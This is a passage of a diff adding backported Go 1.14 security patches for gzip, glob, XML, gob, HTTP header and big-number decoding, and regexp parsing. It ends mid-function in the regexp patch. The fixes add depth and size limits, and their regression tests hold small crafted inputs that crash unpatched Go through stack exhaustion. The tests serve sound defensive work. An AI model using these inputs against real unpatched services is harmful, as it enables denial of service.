+Date: Thu, 25 Aug 2022 11:01:21 +0530
+Subject: [PATCH] CVE-2022-30631
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/0117dee7dccbbd7803d88f65a2ce8bd686219ad3]
+CVE: CVE-2022-30631
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/compress/gzip/gunzip.go | 60 +++++++++++++++-----------------
+ src/compress/gzip/gunzip_test.go | 16 +++++++++
+ 2 files changed, 45 insertions(+), 31 deletions(-)
+
+diff --git a/src/compress/gzip/gunzip.go b/src/compress/gzip/gunzip.go
+index 924bce1..237b2b9 100644
+--- a/src/compress/gzip/gunzip.go
++++ b/src/compress/gzip/gunzip.go
+@@ -248,42 +248,40 @@ func (z *Reader) Read(p []byte) (n int, err error) {
+ return 0, z.err
+ }
+
+- n, z.err = z.decompressor.Read(p)
+- z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
+- z.size += uint32(n)
+- if z.err != io.EOF {
+- // In the normal case we return here.
+- return n, z.err
+- }
++ for n == 0 {
++ n, z.err = z.decompressor.Read(p)
++ z.digest = crc32.Update(z.digest, crc32.IEEETable, p[:n])
++ z.size += uint32(n)
++ if z.err != io.EOF {
++ // In the normal case we return here.
++ return n, z.err
++ }
+
+- // Finished file; check checksum and size.
+- if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
+- z.err = noEOF(err)
+- return n, z.err
+- }
+- digest := le.Uint32(z.buf[:4])
+- size := le.Uint32(z.buf[4:8])
+- if digest != z.digest || size != z.size {
+- z.err = ErrChecksum
+- return n, z.err
+- }
+- z.digest, z.size = 0, 0
++ // Finished file; check checksum and size.
++ if _, err := io.ReadFull(z.r, z.buf[:8]); err != nil {
++ z.err = noEOF(err)
++ return n, z.err
++ }
++ digest := le.Uint32(z.buf[:4])
++ size := le.Uint32(z.buf[4:8])
++ if digest != z.digest || size != z.size {
++ z.err = ErrChecksum
++ return n, z.err
++ }
++ z.digest, z.size = 0, 0
+
+- // File is ok; check if there is another.
+- if !z.multistream {
+- return n, io.EOF
+- }
+- z.err = nil // Remove io.EOF
++ // File is ok; check if there is another.
++ if !z.multistream {
++ return n, io.EOF
++ }
++ z.err = nil // Remove io.EOF
+
+- if _, z.err = z.readHeader(); z.err != nil {
+- return n, z.err
++ if _, z.err = z.readHeader(); z.err != nil {
++ return n, z.err
++ }
+ }
+
+- // Read from next file, if necessary.
+- if n > 0 {
+- return n, nil
+- }
+- return z.Read(p)
++ return n, nil
+ }
+
+ // Close closes the Reader. It does not close the underlying io.Reader.
+diff --git a/src/compress/gzip/gunzip_test.go b/src/compress/gzip/gunzip_test.go
+index 1b01404..95220ae 100644
+--- a/src/compress/gzip/gunzip_test.go
++++ b/src/compress/gzip/gunzip_test.go
+@@ -516,3 +516,19 @@ func TestTruncatedStreams(t *testing.T) {
+ }
+ }
+ }
++
++func TestCVE202230631(t *testing.T) {
++ var empty = []byte{0x1f, 0x8b, 0x08, 0x00, 0xa7, 0x8f, 0x43, 0x62, 0x00,
++ 0x03, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
++ r := bytes.NewReader(bytes.Repeat(empty, 4e6))
++ z, err := NewReader(r)
++ if err != nil {
++ t.Fatalf("NewReader: got %v, want nil", err)
++ }
++ // Prior to CVE-2022-30631 fix, this would cause an unrecoverable panic due
++ // to stack exhaustion.
++ _, err = z.Read(make([]byte, 10))
++ if err != io.EOF {
++ t.Errorf("Reader.Read: got %v, want %v", err, io.EOF)
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
new file mode 100644
index 0000000000..c54ef56a0e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30632.patch
@@ -0,0 +1,71 @@
+From 35d1dfe9746029aea9027b405c75555d41ffd2f8 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:12:40 +0530
+Subject: [PATCH] CVE-2022-30632
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/76f8b7304d1f7c25834e2a0cc9e88c55276c47df]
+CVE: CVE-2022-30632
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/path/filepath/match.go | 16 +++++++++++++++-
+ src/path/filepath/match_test.go | 10 ++++++++++
+ 2 files changed, 25 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/match.go b/src/path/filepath/match.go
+index 46badb5..ba68daa 100644
+--- a/src/path/filepath/match.go
++++ b/src/path/filepath/match.go
+@@ -232,6 +232,20 @@ func getEsc(chunk string) (r rune, nchunk string, err error) {
+ // The only possible returned error is ErrBadPattern, when pattern
+ // is malformed.
+ func Glob(pattern string) (matches []string, err error) {
++ return globWithLimit(pattern, 0)
++}
++
++func globWithLimit(pattern string, depth int) (matches []string, err error) {
++ // This limit is used prevent stack exhaustion issues. See CVE-2022-30632.
++ const pathSeparatorsLimit = 10000
++ if depth == pathSeparatorsLimit {
++ return nil, ErrBadPattern
++ }
++
++ // Check pattern is well-formed.
++ if _, err := Match(pattern, ""); err != nil {
++ return nil, err
++ }
+ if !hasMeta(pattern) {
+ if _, err = os.Lstat(pattern); err != nil {
+ return nil, nil
+@@ -257,7 +271,7 @@ func Glob(pattern string) (matches []string, err error) {
+ }
+
+ var m []string
+- m, err = Glob(dir)
++ m, err = globWithLimit(dir, depth+1)
+ if err != nil {
+ return
+ }
+diff --git a/src/path/filepath/match_test.go b/src/path/filepath/match_test.go
+index b865762..c37c812 100644
+--- a/src/path/filepath/match_test.go
++++ b/src/path/filepath/match_test.go
+@@ -154,6 +154,16 @@ func TestGlob(t *testing.T) {
+ }
+ }
+
++func TestCVE202230632(t *testing.T) {
++ // Prior to CVE-2022-30632, this would cause a stack exhaustion given a
++ // large number of separators (more than 4,000,000). There is now a limit
++ // of 10,000.
++ _, err := Glob("/*" + strings.Repeat("/", 10001))
++ if err != ErrBadPattern {
++ t.Fatalf("Glob returned err=%v, want ErrBadPattern", err)
++ }
++}
++
+ func TestGlobError(t *testing.T) {
+ _, err := Glob("[]")
+ if err == nil {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
new file mode 100644
index 0000000000..c16cb5f50c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30633.patch
@@ -0,0 +1,131 @@
+From ab6e2ffdcab0501bcc2de4b196c1c18ae2301d4b Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 25 Aug 2022 13:29:55 +0530
+Subject: [PATCH] CVE-2022-30633
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/2678d0c957193dceef336c969a9da74dd716a827]
+CVE: CVE-2022-30633
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/xml/read.go | 27 +++++++++++++++++++--------
+ src/encoding/xml/read_test.go | 14 ++++++++++++++
+ 2 files changed, 33 insertions(+), 8 deletions(-)
+
+diff --git a/src/encoding/xml/read.go b/src/encoding/xml/read.go
+index 10a60ee..4ffed80 100644
+--- a/src/encoding/xml/read.go
++++ b/src/encoding/xml/read.go
+@@ -148,7 +148,7 @@ func (d *Decoder) DecodeElement(v interface{}, start *StartElement) error {
+ if val.Kind() != reflect.Ptr {
+ return errors.New("non-pointer passed to Unmarshal")
+ }
+- return d.unmarshal(val.Elem(), start)
++ return d.unmarshal(val.Elem(), start, 0)
+ }
+
+ // An UnmarshalError represents an error in the unmarshaling process.
+@@ -304,8 +304,15 @@ var (
+ textUnmarshalerType = reflect.TypeOf((*encoding.TextUnmarshaler)(nil)).Elem()
+ )
+
++const maxUnmarshalDepth = 10000
++
++var errExeceededMaxUnmarshalDepth = errors.New("exceeded max depth")
++
+ // Unmarshal a single XML element into val.
+-func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
++func (d *Decoder) unmarshal(val reflect.Value, start *StartElement, depth int) error {
++ if depth >= maxUnmarshalDepth {
++ return errExeceededMaxUnmarshalDepth
++ }
+ // Find start element if we need it.
+ if start == nil {
+ for {
+@@ -398,7 +405,7 @@ func (d *Decoder) unmarshal(val reflect.Value, start *StartElement) error {
+ v.Set(reflect.Append(val, reflect.Zero(v.Type().Elem())))
+
+ // Recur to read element into slice.
+- if err := d.unmarshal(v.Index(n), start); err != nil {
++ if err := d.unmarshal(v.Index(n), start, depth+1); err != nil {
+ v.SetLen(n)
+ return err
+ }
+@@ -521,13 +528,15 @@ Loop:
+ case StartElement:
+ consumed := false
+ if sv.IsValid() {
+- consumed, err = d.unmarshalPath(tinfo, sv, nil, &t)
++ // unmarshalPath can call unmarshal, so we need to pass the depth through so that
++ // we can continue to enforce the maximum recusion limit.
++ consumed, err = d.unmarshalPath(tinfo, sv, nil, &t, depth)
+ if err != nil {
+ return err
+ }
+ if !consumed && saveAny.IsValid() {
+ consumed = true
+- if err := d.unmarshal(saveAny, &t); err != nil {
++ if err := d.unmarshal(saveAny, &t, depth+1); err != nil {
+ return err
+ }
+ }
+@@ -672,7 +681,7 @@ func copyValue(dst reflect.Value, src []byte) (err error) {
+ // The consumed result tells whether XML elements have been consumed
+ // from the Decoder until start's matching end element, or if it's
+ // still untouched because start is uninteresting for sv's fields.
+-func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement) (consumed bool, err error) {
++func (d *Decoder) unmarshalPath(tinfo *typeInfo, sv reflect.Value, parents []string, start *StartElement, depth int) (consumed bool, err error) {
+ recurse := false
+ Loop:
+ for i := range tinfo.fields {
+@@ -687,7 +696,7 @@ Loop:
+ }
+ if len(finfo.parents) == len(parents) && finfo.name == start.Name.Local {
+ // It's a perfect match, unmarshal the field.
+- return true, d.unmarshal(finfo.value(sv), start)
++ return true, d.unmarshal(finfo.value(sv), start, depth+1)
+ }
+ if len(finfo.parents) > len(parents) && finfo.parents[len(parents)] == start.Name.Local {
+ // It's a prefix for the field. Break and recurse
+@@ -716,7 +725,9 @@ Loop:
+ }
+ switch t := tok.(type) {
+ case StartElement:
+- consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t)
++ // the recursion depth of unmarshalPath is limited to the path length specified
++ // by the struct field tag, so we don't increment the depth here.
++ consumed2, err := d.unmarshalPath(tinfo, sv, parents, &t, depth)
+ if err != nil {
+ return true, err
+ }
+diff --git a/src/encoding/xml/read_test.go b/src/encoding/xml/read_test.go
+index 8c2e70f..6a20b1a 100644
+--- a/src/encoding/xml/read_test.go
++++ b/src/encoding/xml/read_test.go
+@@ -5,6 +5,7 @@
+ package xml
+
+ import (
++ "errors"
+ "io"
+ "reflect"
+ "strings"
+@@ -1079,3 +1080,16 @@ func TestUnmarshalWhitespaceAttrs(t *testing.T) {
+ t.Fatalf("whitespace attrs: Unmarshal:\nhave: %#+v\nwant: %#+v", v, want)
+ }
+ }
++
++func TestCVE202228131(t *testing.T) {
++ type nested struct {
++ Parent *nested `xml:",any"`
++ }
++ var n nested
++ err := Unmarshal(bytes.Repeat([]byte("<a>"), maxUnmarshalDepth+1), &n)
++ if err == nil {
++ t.Fatal("Unmarshal did not fail")
++ } else if !errors.Is(err, errExeceededMaxUnmarshalDepth) {
++ t.Fatalf("Unmarshal unexpected error: got %q, want %q", err, errExeceededMaxUnmarshalDepth)
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
new file mode 100644
index 0000000000..73959f70fa
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-30635.patch
@@ -0,0 +1,120 @@
+From fdd4316737ed5681689a1f40802ffa0805e5b11c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:17:05 +0530
+Subject: [PATCH] CVE-2022-30635
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/cd54600b866db0ad068ab8df06c7f5f6cb55c9b3]
+CVE-2022-30635
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/encoding/gob/decode.go | 19 ++++++++++++-------
+ src/encoding/gob/gobencdec_test.go | 24 ++++++++++++++++++++++++
+ 2 files changed, 36 insertions(+), 7 deletions(-)
+
+diff --git a/src/encoding/gob/decode.go b/src/encoding/gob/decode.go
+index d2f6c74..0e0ec75 100644
+--- a/src/encoding/gob/decode.go
++++ b/src/encoding/gob/decode.go
+@@ -871,8 +871,13 @@ func (dec *Decoder) decOpFor(wireId typeId, rt reflect.Type, name string, inProg
+ return &op
+ }
+
++var maxIgnoreNestingDepth = 10000
++
+ // decIgnoreOpFor returns the decoding op for a field that has no destination.
+-func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp) *decOp {
++func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp, depth int) *decOp {
++ if depth > maxIgnoreNestingDepth {
++ error_(errors.New("invalid nesting depth"))
++ }
+ // If this type is already in progress, it's a recursive type (e.g. map[string]*T).
+ // Return the pointer to the op we're already building.
+ if opPtr := inProgress[wireId]; opPtr != nil {
+@@ -896,7 +901,7 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
+ errorf("bad data: undefined type %s", wireId.string())
+ case wire.ArrayT != nil:
+ elemId := wire.ArrayT.Elem
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreArray(state, *elemOp, wire.ArrayT.Len)
+ }
+@@ -904,15 +909,15 @@ func (dec *Decoder) decIgnoreOpFor(wireId typeId, inProgress map[typeId]*decOp)
+ case wire.MapT != nil:
+ keyId := dec.wireType[wireId].MapT.Key
+ elemId := dec.wireType[wireId].MapT.Elem
+- keyOp := dec.decIgnoreOpFor(keyId, inProgress)
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ keyOp := dec.decIgnoreOpFor(keyId, inProgress, depth+1)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreMap(state, *keyOp, *elemOp)
+ }
+
+ case wire.SliceT != nil:
+ elemId := wire.SliceT.Elem
+- elemOp := dec.decIgnoreOpFor(elemId, inProgress)
++ elemOp := dec.decIgnoreOpFor(elemId, inProgress, depth+1)
+ op = func(i *decInstr, state *decoderState, value reflect.Value) {
+ state.dec.ignoreSlice(state, *elemOp)
+ }
+@@ -1073,7 +1078,7 @@ func (dec *Decoder) compileSingle(remoteId typeId, ut *userTypeInfo) (engine *de
+ func (dec *Decoder) compileIgnoreSingle(remoteId typeId) *decEngine {
+ engine := new(decEngine)
+ engine.instr = make([]decInstr, 1) // one item
+- op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp))
++ op := dec.decIgnoreOpFor(remoteId, make(map[typeId]*decOp), 0)
+ ovfl := overflow(dec.typeString(remoteId))
+ engine.instr[0] = decInstr{*op, 0, nil, ovfl}
+ engine.numInstr = 1
+@@ -1118,7 +1123,7 @@ func (dec *Decoder) compileDec(remoteId typeId, ut *userTypeInfo) (engine *decEn
+ localField, present := srt.FieldByName(wireField.Name)
+ // TODO(r): anonymous names
+ if !present || !isExported(wireField.Name) {
+- op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp))
++ op := dec.decIgnoreOpFor(wireField.Id, make(map[typeId]*decOp), 0)
+ engine.instr[fieldnum] = decInstr{*op, fieldnum, nil, ovfl}
+ continue
+ }
+diff --git a/src/encoding/gob/gobencdec_test.go b/src/encoding/gob/gobencdec_test.go
+index 6d2c8db..1b52ecc 100644
+--- a/src/encoding/gob/gobencdec_test.go
++++ b/src/encoding/gob/gobencdec_test.go
+@@ -12,6 +12,7 @@ import (
+ "fmt"
+ "io"
+ "net"
++ "reflect"
+ "strings"
+ "testing"
+ "time"
+@@ -796,3 +797,26 @@ func TestNetIP(t *testing.T) {
+ t.Errorf("decoded to %v, want 1.2.3.4", ip.String())
+ }
+ }
++
++func TestIngoreDepthLimit(t *testing.T) {
++ // We don't test the actual depth limit because it requires building an
++ // extremely large message, which takes quite a while.
++ oldNestingDepth := maxIgnoreNestingDepth
++ maxIgnoreNestingDepth = 100
++ defer func() { maxIgnoreNestingDepth = oldNestingDepth }()
++ b := new(bytes.Buffer)
++ enc := NewEncoder(b)
++ typ := reflect.TypeOf(int(0))
++ nested := reflect.ArrayOf(1, typ)
++ for i := 0; i < 100; i++ {
++ nested = reflect.ArrayOf(1, nested)
++ }
++ badStruct := reflect.New(reflect.StructOf([]reflect.StructField{{Name: "F", Type: nested}}))
++ enc.Encode(badStruct.Interface())
++ dec := NewDecoder(b)
++ var output struct{ Hello int }
++ expectedErr := "invalid nesting depth"
++ if err := dec.Decode(&output); err == nil || err.Error() != expectedErr {
++ t.Errorf("Decode didn't fail with depth limit of 100: want %q, got %q", expectedErr, err)
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
new file mode 100644
index 0000000000..aab98e99fd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32148.patch
@@ -0,0 +1,49 @@
+From 0fe3adec199e8cd2c101933f75d8cd617de70350 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 26 Aug 2022 12:48:13 +0530
+Subject: [PATCH] CVE-2022-32148
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/ed2f33e1a7e0d18f61bd56f7ee067331d612c27e]
+CVE: CVE-2022-32148
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/net/http/header.go | 6 ++++++
+ src/net/http/header_test.go | 5 +++++
+ 2 files changed, 11 insertions(+)
+
+diff --git a/src/net/http/header.go b/src/net/http/header.go
+index b9b5391..221f613 100644
+--- a/src/net/http/header.go
++++ b/src/net/http/header.go
+@@ -100,6 +100,12 @@ func (h Header) Clone() Header {
+ sv := make([]string, nv) // shared backing array for headers' values
+ h2 := make(Header, len(h))
+ for k, vv := range h {
++ if vv == nil {
++ // Preserve nil values. ReverseProxy distinguishes
++ // between nil and zero-length header values.
++ h2[k] = nil
++ continue
++ }
+ n := copy(sv, vv)
+ h2[k] = sv[:n:n]
+ sv = sv[n:]
+diff --git a/src/net/http/header_test.go b/src/net/http/header_test.go
+index 4789362..80c0035 100644
+--- a/src/net/http/header_test.go
++++ b/src/net/http/header_test.go
+@@ -235,6 +235,11 @@ func TestCloneOrMakeHeader(t *testing.T) {
+ in: Header{"foo": {"bar"}},
+ want: Header{"foo": {"bar"}},
+ },
++ {
++ name: "nil value",
++ in: Header{"foo": nil},
++ want: Header{"foo": nil},
++ },
+ }
+
+ for _, tt := range tests {
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
new file mode 100644
index 0000000000..15fda7de1b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-32189.patch
@@ -0,0 +1,113 @@
+From 027e7e1578d3d7614f7586eff3894b83d9709e14 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 29 Aug 2022 10:08:34 +0530
+Subject: [PATCH] CVE-2022-32189
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/703c8ab7e5ba75c95553d4e249309297abad7102]
+CVE: CVE-2022-32189
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ src/math/big/floatmarsh.go | 7 +++++++
+ src/math/big/floatmarsh_test.go | 12 ++++++++++++
+ src/math/big/ratmarsh.go | 6 ++++++
+ src/math/big/ratmarsh_test.go | 12 ++++++++++++
+ 4 files changed, 37 insertions(+)
+
+diff --git a/src/math/big/floatmarsh.go b/src/math/big/floatmarsh.go
+index d1c1dab..990e085 100644
+--- a/src/math/big/floatmarsh.go
++++ b/src/math/big/floatmarsh.go
+@@ -8,6 +8,7 @@ package big
+
+ import (
+ "encoding/binary"
++ "errors"
+ "fmt"
+ )
+
+@@ -67,6 +68,9 @@ func (z *Float) GobDecode(buf []byte) error {
+ *z = Float{}
+ return nil
+ }
++ if len(buf) < 6 {
++ return errors.New("Float.GobDecode: buffer too small")
++ }
+
+ if buf[0] != floatGobVersion {
+ return fmt.Errorf("Float.GobDecode: encoding version %d not supported", buf[0])
+@@ -83,6 +87,9 @@ func (z *Float) GobDecode(buf []byte) error {
+ z.prec = binary.BigEndian.Uint32(buf[2:])
+
+ if z.form == finite {
++ if len(buf) < 10 {
++ return errors.New("Float.GobDecode: buffer too small for finite form float")
++ }
+ z.exp = int32(binary.BigEndian.Uint32(buf[6:]))
+ z.mant = z.mant.setBytes(buf[10:])
+ }
+diff --git a/src/math/big/floatmarsh_test.go b/src/math/big/floatmarsh_test.go
+index c056d78..401f45a 100644
+--- a/src/math/big/floatmarsh_test.go
++++ b/src/math/big/floatmarsh_test.go
+@@ -137,3 +137,15 @@ func TestFloatJSONEncoding(t *testing.T) {
+ }
+ }
+ }
++
++func TestFloatGobDecodeShortBuffer(t *testing.T) {
++ for _, tc := range [][]byte{
++ []byte{0x1, 0x0, 0x0, 0x0},
++ []byte{0x1, 0xfa, 0x0, 0x0, 0x0, 0x0},
++ } {
++ err := NewFloat(0).GobDecode(tc)
++ if err == nil {
++ t.Error("expected GobDecode to return error for malformed input")
++ }
++ }
++}
+diff --git a/src/math/big/ratmarsh.go b/src/math/big/ratmarsh.go
+index fbc7b60..56102e8 100644
+--- a/src/math/big/ratmarsh.go
++++ b/src/math/big/ratmarsh.go
+@@ -45,12 +45,18 @@ func (z *Rat) GobDecode(buf []byte) error {
+ *z = Rat{}
+ return nil
+ }
++ if len(buf) < 5 {
++ return errors.New("Rat.GobDecode: buffer too small")
++ }
+ b := buf[0]
+ if b>>1 != ratGobVersion {
+ return fmt.Errorf("Rat.GobDecode: encoding version %d not supported", b>>1)
+ }
+ const j = 1 + 4
+ i := j + binary.BigEndian.Uint32(buf[j-4:j])
++ if len(buf) < int(i) {
++ return errors.New("Rat.GobDecode: buffer too small")
++ }
+ z.a.neg = b&1 != 0
+ z.a.abs = z.a.abs.setBytes(buf[j:i])
+ z.b.abs = z.b.abs.setBytes(buf[i:])
+diff --git a/src/math/big/ratmarsh_test.go b/src/math/big/ratmarsh_test.go
+index 351d109..55a9878 100644
+--- a/src/math/big/ratmarsh_test.go
++++ b/src/math/big/ratmarsh_test.go
+@@ -123,3 +123,15 @@ func TestRatXMLEncoding(t *testing.T) {
+ }
+ }
+ }
++
++func TestRatGobDecodeShortBuffer(t *testing.T) {
++ for _, tc := range [][]byte{
++ []byte{0x2},
++ []byte{0x2, 0x0, 0x0, 0x0, 0xff},
++ } {
++ err := NewRat(1, 2).GobDecode(tc)
++ if err == nil {
++ t.Error("expected GobDecode to return error for malformed input")
++ }
++ }
++}
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
new file mode 100644
index 0000000000..fac0ebe94c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41715.patch
@@ -0,0 +1,271 @@
+From e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Wed, 28 Sep 2022 11:18:51 -0400
+Subject: [PATCH] [release-branch.go1.18] regexp: limit size of parsed regexps
+
+Set a 128 MB limit on the amount of space used by []syntax.Inst
+in the compiled form corresponding to a given regexp.
+
+Also set a 128 MB limit on the rune storage in the *syntax.Regexp
+tree itself.
+
+Thanks to Adam Korczynski (ADA Logics) and OSS-Fuzz for reporting this issue.
+
+Fixes CVE-2022-41715.
+Updates #55949.
+Fixes #55950.
+
+Change-Id: Ia656baed81564436368cf950e1c5409752f28e1b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1592136
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/438501
+Run-TryBot: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Carlos Amedee <carlos@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/e9017c2416ad0ef642f5e0c2eab2dbf3cba4d997]
+CVE: CVE-2022-41715
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/regexp/syntax/parse.go | 145 ++++++++++++++++++++++++++++++--
+ src/regexp/syntax/parse_test.go | 13 +--
+ 2 files changed, 148 insertions(+), 10 deletions(-)
+
+diff --git a/src/regexp/syntax/parse.go b/src/regexp/syntax/parse.go
+index 55bd20d..60491d5 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -90,15 +90,49 @@ const (
+ // until we've allocated at least maxHeight Regexp structures.
+ const maxHeight = 1000
+
++// maxSize is the maximum size of a compiled regexp in Insts.
++// It too is somewhat arbitrarily chosen, but the idea is to be large enough
++// to allow significant regexps while at the same time small enough that
++// the compiled form will not take up too much memory.
++// 128 MB is enough for a 3.3 million Inst structures, which roughly
++// corresponds to a 3.3 MB regexp.
++const (
++ maxSize = 128 << 20 / instSize
++ instSize = 5 * 8 // byte, 2 uint32, slice is 5 64-bit words
++)
++
++// maxRunes is the maximum number of runes allowed in a regexp tree
++// counting the runes in all the nodes.
++// Ignoring character classes p.numRunes is always less than the length of the regexp.
++// Character classes can make it much larger: each \pL adds 1292 runes.
++// 128 MB is enough for 32M runes, which is over 26k \pL instances.
++// Note that repetitions do not make copies of the rune slices,
++// so \pL{1000} is only one rune slice, not 1000.
++// We could keep a cache of character classes we've seen,
++// so that all the \pL we see use the same rune list,
++// but that doesn't remove the problem entirely:
++// consider something like [\pL01234][\pL01235][\pL01236]...[\pL^&*()].
++// And because the Rune slice is exposed directly in the Regexp,
++// there is not an opportunity to change the representation to allow
++// partial sharing between different character classes.
++// So the limit is the best we can do.
++const (
++ maxRunes = 128 << 20 / runeSize
++ runeSize = 4 // rune is int32
++)
++
+ type parser struct {
+ flags Flags // parse mode flags
+ stack []*Regexp // stack of parsed expressions
+ free *Regexp
+ numCap int // number of capturing groups seen
+ wholeRegexp string
+- tmpClass []rune // temporary char class work space
+- numRegexp int // number of regexps allocated
+- height map[*Regexp]int // regexp height for height limit check
++ tmpClass []rune // temporary char class work space
++ numRegexp int // number of regexps allocated
++ numRunes int // number of runes in char classes
++ repeats int64 // product of all repetitions seen
++ height map[*Regexp]int // regexp height, for height limit check
++ size map[*Regexp]int64 // regexp compiled size, for size limit check
+ }
+
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -122,6 +156,104 @@ func (p *parser) reuse(re *Regexp) {
+ p.free = re
+ }
+
++func (p *parser) checkLimits(re *Regexp) {
++ if p.numRunes > maxRunes {
++ panic(ErrInternalError)
++ }
++ p.checkSize(re)
++ p.checkHeight(re)
++}
++
++func (p *parser) checkSize(re *Regexp) {
++ if p.size == nil {
++ // We haven't started tracking size yet.
++ // Do a relatively cheap check to see if we need to start.
++ // Maintain the product of all the repeats we've seen
++ // and don't track if the total number of regexp nodes
++ // we've seen times the repeat product is in budget.
++ if p.repeats == 0 {
++ p.repeats = 1
++ }
++ if re.Op == OpRepeat {
++ n := re.Max
++ if n == -1 {
++ n = re.Min
++ }
++ if n <= 0 {
++ n = 1
++ }
++ if int64(n) > maxSize/p.repeats {
++ p.repeats = maxSize
++ } else {
++ p.repeats *= int64(n)
++ }
++ }
++ if int64(p.numRegexp) < maxSize/p.repeats {
++ return
++ }
++
++ // We need to start tracking size.
++ // Make the map and belatedly populate it
++ // with info about everything we've constructed so far.
++ p.size = make(map[*Regexp]int64)
++ for _, re := range p.stack {
++ p.checkSize(re)
++ }
++ }
++
++ if p.calcSize(re, true) > maxSize {
++ panic(ErrInternalError)
++ }
++}
++
++func (p *parser) calcSize(re *Regexp, force bool) int64 {
++ if !force {
++ if size, ok := p.size[re]; ok {
++ return size
++ }
++ }
++
++ var size int64
++ switch re.Op {
++ case OpLiteral:
++ size = int64(len(re.Rune))
++ case OpCapture, OpStar:
++ // star can be 1+ or 2+; assume 2 pessimistically
++ size = 2 + p.calcSize(re.Sub[0], false)
++ case OpPlus, OpQuest:
++ size = 1 + p.calcSize(re.Sub[0], false)
++ case OpConcat:
++ for _, sub := range re.Sub {
++ size += p.calcSize(sub, false)
++ }
++ case OpAlternate:
++ for _, sub := range re.Sub {
++ size += p.calcSize(sub, false)
++ }
++ if len(re.Sub) > 1 {
++ size += int64(len(re.Sub)) - 1
++ }
++ case OpRepeat:
++ sub := p.calcSize(re.Sub[0], false)
++ if re.Max == -1 {
++ if re.Min == 0 {
++ size = 2 + sub // x*
++ } else {
++ size = 1 + int64(re.Min)*sub // xxx+
++ }
++ break
++ }
